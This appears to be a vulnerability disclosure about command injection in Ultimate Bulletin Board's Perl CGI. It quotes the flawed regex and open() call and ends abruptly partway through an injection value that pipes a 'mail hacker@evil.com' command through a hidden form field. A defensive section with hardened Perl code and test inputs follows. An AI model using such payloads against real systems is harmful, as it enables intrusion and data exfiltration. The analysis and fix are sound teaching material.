Hello. Writing CGI scripts in Perl is simple. It's also rather safe, provided authors follow very simple instructions. But they don't.

Browsing some site, I found that their forums were based not on home-made scripts, but rather on a commercial software product. Hey, I said to myself, remember that story about the PCWeek hack? They used the commercial package PhotoAds. Let's look at what this Ultimate Bulletin Board by Infopop is.

I grabbed the freeware version from http://www.ultimatebb.com and after 10 minutes of grepping found these lines:

ubb_library.pl:901-902

    if ($ThreadFile =~ /\d\d\d\d\d\d\.ubb/) {
        open (MESSAGE, "$ForumsPath/Forum$number/$ThreadFile");

(Notice? Not /^\d\d\d\d\d\d\.ubb$/. What was the author thinking about while writing it? Girls?)

And $ThreadFile takes its value directly from the hidden (hmm!) field `topic'. So when I filled the form with topic='012345.ubb|mail hacker@evil.com
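To make the defect concrete from the fixing side, here is an added example (mine, not UBB's code) that puts the unanchored check quoted above next to a hardened version: an anchored, fixed-width pattern and a three-argument open with an explicit mode, so the filename can never be read as a pipe or mode prefix. The variable names $ForumsPath and $number follow the post; the helper names and the sample inputs are assumptions I constructed.

```perl
#!/usr/bin/perl
# Added example, not from UBB: weak check as quoted in the post vs. a
# hardened one. Helper names and sample inputs are constructed.
use strict;
use warnings;

# The check as it appears in ubb_library.pl: unanchored, so it matches any
# string that merely *contains* six digits followed by ".ubb".
sub weak_check {
    my ($thread) = @_;
    return $thread =~ /\d\d\d\d\d\d\.ubb/ ? 1 : 0;
}

# Hardened check: anchored with \A and \z, fixed width, nothing else allowed.
# Returning the captured text (not the input) also untaints it under perl -T.
sub safe_thread_name {
    my ($thread) = @_;
    return unless defined $thread && $thread =~ /\A(\d{6}\.ubb)\z/;
    return $1;
}

# Build the path only from validated pieces, then open with an explicit
# read mode: three-argument open never interprets '|', '<' or '>' in $path.
sub open_thread {
    my ($forums_path, $number, $thread) = @_;
    my $name = safe_thread_name($thread) or return;
    return unless defined $number && $number =~ /\A(\d+)\z/;
    my $path = "$forums_path/Forum$1/$name";
    open(my $fh, '<', $path) or return;
    return $fh;
}

# Constructed inputs: a legitimate name, the pipe shape from the post with
# a placeholder command, a traversal attempt, and a too-short name.
my @inputs = ('012345.ubb', '012345.ubb|cmd', '../012345.ubb', '12345.ubb');
for my $t (@inputs) {
    printf "%-18s weak=%d hardened=%s\n", $t, weak_check($t),
        defined(safe_thread_name($t)) ? 'accepted' : 'rejected';
}
```

Running it shows the weak check accepting three of the four inputs (everything that contains six digits and ".ubb" anywhere) while the anchored check accepts only the plain 012345.ubb. The three-argument open is the second, independent layer: even if validation were bypassed, the filename would be opened for reading as a literal path rather than handed to a shell.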